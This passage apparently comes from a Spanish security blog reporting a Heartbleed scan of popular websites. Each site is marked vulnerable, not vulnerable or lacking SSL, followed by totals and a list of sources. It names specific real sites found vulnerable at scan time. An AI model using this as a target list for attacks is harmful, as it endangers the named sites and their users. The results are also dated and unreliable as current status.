biblegateway.com… not vulnerable.
hstpnetwork.com… no SSL.
sears.com… not vulnerable.
cy-pr.com… no SSL.
nfl.com… not vulnerable.
klikbca.com… no SSL.
ibm.com… no SSL.
yandex.kz… not vulnerable.
jobrapido.com… no SSL.
gamespot.com… not vulnerable.
searchengineland.com… not vulnerable.
nokia.com… no SSL.
spankwire.com… no SSL.
fatakat.com… no SSL.
mapquest.com… no SSL.
sexlog.com… not vulnerable.
nhl.com… no SSL.
basecamp.com… not vulnerable.
tabnak.ir… no SSL.
gismeteo.ru… no SSL.
gap.com… no SSL.
youboy.com… no SSL.
6.cn… no SSL.
jeuxvideo.com… not vulnerable.
fishcod.com… no SSL.
nypost.com… not vulnerable.
heise.de… not vulnerable.
magentocommerce.com… not vulnerable.
letitbit.net… not vulnerable.
hongkiat.com… no SSL.
leagueoflegends.com… not vulnerable.
dmm.com… no SSL.
nikkei.com… no SSL.
ted.com… not vulnerable.
sozcu.com.tr… no SSL.
ahrefs.com… not vulnerable.
welt.de… no SSL.
tablica.pl… not vulnerable.
infobae.com… no SSL.
milanuncios.com… no SSL.
sulekha.com… no SSL.
fhserve.com… not vulnerable.
google.com.do… not vulnerable.
wmmail.ru… not vulnerable.
cam4.com… no SSL.
novinky.cz… no SSL.
screencast.com… no SSL.
thehindu.com… no SSL.
instructables.com… not vulnerable.
gulfup.com… no SSL.
deezer.com… not vulnerable.
aizhan.com… no SSL.
zimbio.com… no SSL.
fool.com… vulnerable.
mercadolibre.com.ve… no SSL.
digitalpoint.com… vulnerable.
gtmetrix.com… not vulnerable.
webhostingtalk.com… not vulnerable.
ccb.com… no SSL.
bankmellat.ir… no SSL.
google.com.ly… not vulnerable.
ovh.net… no SSL.
streamcloud.eu… no SSL.
box.com… not vulnerable.
android.com… not vulnerable.
sitepoint.com… not vulnerable.
weheartit.com… not vulnerable.
imagebam.com… no SSL.
p5w.net… no SSL.
nairaland.com… not vulnerable.
hm.com… no SSL.
primewire.ag… no SSL.
japanpost.jp… not vulnerable.
cbc.ca… no SSL.
kickstarter.com… not vulnerable.
qinbei.com… no SSL.
staples.com… no SSL.
sahadan.com… no SSL.
dafont.com… not vulnerable.
whitepages.com… not vulnerable.
popcash.net… not vulnerable.
z5x.net… not vulnerable.
businessweek.com… no SSL.
xunlei.com… no SSL.
subito.it… no SSL.
graphicriver.net… no SSL.
disney.go.com… not vulnerable.
theverge.com… no SSL.
cbs.com… no SSL.
pr-cy.ru… not vulnerable.
mediaset.it… no SSL.
lapatilla.com… not vulnerable.
ustream.tv… not vulnerable.
getbootstrap.com… no SSL.
google.rs… not vulnerable.
picmonkey.com… vulnerable.
dmoz.org… no SSL.
rutor.org… no SSL.
keepvid.com… no SSL.
united.com… not vulnerable.
pingdom.com… not vulnerable.
tutsplus.com… not vulnerable.
sky.com… no SSL.
billdesk.com… not vulnerable.
petflow.com… vulnerable.
grooveshark.com… not vulnerable.
careerbuilder.com… not vulnerable.
squidoo.com… vulnerable.
ticketmaster.com… not vulnerable.
avazutracking.net… vulnerable.
woorank.com… not vulnerable.
nike.com… not vulnerable.
sporx.com… not vulnerable.
makemytrip.com… not vulnerable.
chinanews.com… no SSL.
elegantthemes.com… vulnerable.
change.org… not vulnerable.
biglobe.ne.jp… no SSL.
google.hr… not vulnerable.
indiamart.com… no SSL.
postimg.org… no SSL.
myspace.com… no SSL.
xiaomi.com… not vulnerable.
anyoption.com… no SSL.
mysql.com… not vulnerable.
lockerdome.com… not vulnerable.
foodnetwork.com… no SSL.
dealshark.com… no SSL.
55bbs.com… no SSL.
forobeta.com… no SSL.
xtube.com… not vulnerable.
gumtree.com… no SSL.
sueddeutsche.de… not vulnerable.
mbc.net… no SSL.
peyvandha.ir… no SSL.
keezmovies.com… no SSL.
zulily.com… not vulnerable.
firstpost.com… no SSL.
aftonbladet.se… not vulnerable.
comcast.com… no SSL.
beytoote.com… no SSL.
woothemes.com… not vulnerable.
seekingalpha.com… not vulnerable.
orf.at… no SSL.
searchenginewatch.com… no SSL.
video-one.com… no SSL.
verizon.com… no SSL.
ezinearticles.com… not vulnerable.
ileehoo.com… no SSL.
pinimg.com… no SSL.
savefrom.net… not vulnerable.
brainyquote.com… no SSL.
500px.com… vulnerable.
delta.com… not vulnerable.
icloud.com… no SSL.
tribunnews.com… no SSL.
mmbang.com… no SSL.
hindustantimes.com… no SSL.
6park.com… no SSL.
premierleague.com… no SSL.
spotify.com… not vulnerable.
icicibank.co.in… no SSL.
rakuten.com… no SSL.
tistory.com… not vulnerable.
pantip.com… no SSL.
dantri.com.vn… no SSL.
fidelity.com… not vulnerable.
fastdailyfind.com… no SSL.
pcpop.com… no SSL.
skysports.com… no SSL.
abc.es… no SSL.
kioskea.net… no SSL.
51fanli.com… no SSL.
manta.com… not vulnerable.
dubizzle.com… no SSL.
almanar.com.lb… no SSL.
stagram.com… not vulnerable.
ovh.com… not vulnerable.
eztv.it… not vulnerable.
cloob.com… no SSL.
eluniversal.com.mx… no SSL.
souq.com… no SSL.
1und1.de… not vulnerable.
gstatic.com… not vulnerable.
online.sh.cn… no SSL.
forexfactory.com… no SSL.
vcommission.com… no SSL.
ilivid.com… not vulnerable.
104.com.tw… no SSL.
56.com… not vulnerable.
sofanti.com… no SSL.
css-tricks.com… not vulnerable.
myfitnesspal.com… not vulnerable.
kohls.com… not vulnerable.
wmtransfer.com… no SSL.
tinypic.com… no SSL.
openadserving.com… not vulnerable.
statigr.am… no SSL.
eastmoney.com… no SSL.
wiocha.pl… not vulnerable.
namecheap.com… not vulnerable.
google.by… not vulnerable.
merdeka.com… no SSL.
linkwithin.com… no SSL.
homeway.com.cn… no SSL.


No SSL: 512
Vulnerable: 47
Not vulnerable: 441


FUENTES

blog.segu-info.com.ar
www.github.com
www.heartbleed.com
www.securitybydefault.com